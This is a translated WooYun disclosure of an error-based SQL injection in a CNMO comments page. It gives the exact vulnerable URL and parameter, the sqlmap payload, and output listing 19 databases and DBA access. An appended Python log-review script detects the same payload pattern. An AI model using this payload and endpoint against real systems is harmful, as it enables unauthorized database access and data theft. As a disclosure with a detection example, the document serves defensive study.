
Vulnerability summary

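Vulnerability ID: wooyun-2015-0144081

Vulnerability title: Injection on a 手机中国 (CNMO) site involving 19 databases (DBA privileges)

Vendor: 手机中国 (CNMO)

Vulnerability author: 路人甲

Submitted: 2015-09-29 16:11

Fixed: 2015-11-14 11:44

Disclosed: 2015-11-14 11:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Confirmed by the vendor

Vulnerability source: http://www.wooyun.org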


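Vulnerability details

Disclosure status:

2015-09-29: Details reported to the vendor; awaiting vendor handling
2015-09-30: Vendor confirmed; details disclosed to the vendor only
2015-10-10: Details disclosed to core white hats and experts in related fields
2015-10-20: Details disclosed to regular white hats
2015-10-30: Details disclosed to intern white hats
2015-11-14: Details disclosed to the public

Brief description:

About CNMO
手机中国网 (CNMO.COM) was founded in September 2007. It focuses on building high-end, professional mobile phone content, has more than 20 professional channels and over 100 sub-channels, and provides the latest market information on more than 1,200 phones every day. Every day, thousands of dealers use the CNMO platform to exchange business information with users. CNMO provides customers with integrated online marketing services that combine news, interaction and marketing.
Finding an injection point really wasn't easy!

Detailed description:

Injection point:
http://comments.cnmo.com/doc_vote2010.php?document_id=
Injected parameter: document_id

[Screenshot: cnmo-注入点.jpg]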


GET parameter 'document_id' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2105 HTTP(s)
requests:
---
Parameter: document_id (GET)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: document_id=-5706 OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE W
HEN (3039=3039) THEN 1 ELSE 0 END)),0x7176767071,FLOOR(RAND(0)*2)) HAVING MIN(0)
#
---
[15:43:15] [INFO] testing MySQL
[15:43:24] [INFO] confirming MySQL
[15:43:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[15:43:24] [INFO] fetching database names
[15:43:25] [INFO] the SQL query used returns 19 entries
[15:43:25] [INFO] retrieved: information_schema
[15:43:25] [INFO] retrieved: cnmo_active
[15:43:25] [INFO] retrieved: cnmo_dealer
[15:43:25] [INFO] retrieved: cnmo_dealer_counter
[15:43:25] [INFO] retrieved: cnmo_mall
[15:43:26] [INFO] retrieved: cnmo_new_stats
[15:43:26] [INFO] retrieved: cnmo_picture
[15:43:26] [INFO] retrieved: cnmo_product
[15:43:26] [INFO] retrieved: cnmo_s
[15:43:26] [INFO] retrieved: cnmo_stat_hits
[15:43:26] [INFO] retrieved: cnmo_tihuobao
[15:43:27] [INFO] retrieved: cnmo_zoldb
[15:43:27] [INFO] retrieved: mysql
[15:43:27] [INFO] retrieved: new_article
[15:43:27] [INFO] retrieved: new_comment
[15:43:27] [INFO] retrieved: new_plugin
[15:43:57] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
[15:44:31] [INFO] retrieved: new_power
[15:44:31] [INFO] retrieved: substation_admin_power
[15:44:31] [INFO] retrieved: test
available databases [19]:
[*] cnmo_active
[*] cnmo_dealer
[*] cnmo_dealer_counter
[*] cnmo_mall
[*] cnmo_new_stats
[*] cnmo_picture
[*] cnmo_product
[*] cnmo_s
[*] cnmo_stat_hits
[*] cnmo_tihuobao
[*] cnmo_zoldb
[*] information_schema
[*] mysql
[*] new_article
[*] new_comment
[*] new_plugin
[*] new_power
[*] substation_admin_power
[*] test


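Proof of vulnerability:

19 databases are involved:

[Screenshot: cnmo-数据库.jpg]


And with DBA privileges:

[Screenshot: cnmo-dba.jpg]


Partial database information:

[Screenshot: cnmo-active库.jpg]


[Screenshot: cnmo-zoldb库.jpg]


Fix:

So many databases, asking for 20 rank! Thanks

Copyright notice: please credit the source when reposting: 路人甲@乌云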
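
A log-review sketch for the finding above, added here as an example and not part of the original report or the vendor's code: it flags requests to doc_vote2010.php whose document_id is not a plain integer, or that carry the GROUP BY CONCAT / FLOOR(RAND(0)*2) error-based pattern shown in the sqlmap output. The Apache combined log format, the sample log lines, the function names, and the premise that legitimate document_id values are non-negative integers are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format); IPs, times and agents are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Sep/2015:15:40:01 +0800] "GET /doc_vote2010.php?document_id=12345 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/Sep/2015:15:43:15 +0800] "GET /doc_vote2010.php?document_id=-5706%20OR%201%20GROUP%20BY%20CONCAT(0x716a627871,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)%23 HTTP/1.1" 200 733 "-" "sqlmap/1.0-dev"',
    '198.51.100.7 - - [29/Sep/2015:15:44:02 +0800] "GET /index.php?id=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/Sep/2015:15:44:31 +0800] "GET /doc_vote2010.php?document_id=12%27 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r'\d+')
# Duplicate-key error technique visible in the payload sqlmap reported on this page.
ERROR_BASED_RE = re.compile(r'group\s+by\s+concat\s*\(.*floor\s*\(\s*rand\s*\(', re.I | re.S)

def classify(line, script='/doc_vote2010.php', param='document_id'):
    """Return (client_ip, verdict) for requests to the script, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    if url.path != script:
        return None
    # parse_qs URL-decodes values, so encoded payloads are matched in clear text.
    values = parse_qs(url.query, keep_blank_values=True).get(param, [''])
    if any(ERROR_BASED_RE.search(v) for v in values):
        return ip, 'error-based-sqli'
    if all(INT_RE.fullmatch(v) for v in values):
        return ip, 'ok'
    return ip, 'non-integer'

def scan(lines):
    """Collect flagged requests as (ip, verdict) tuples, skipping clean ones."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r[1] != 'ok']

if __name__ == '__main__':
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes this class of injection; the log check only shows who has been probing the parameter.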


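Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-09-30 11:43

Vendor reply:

Thank you for finding this vulnerability; we will fix it right away

Latest status:

None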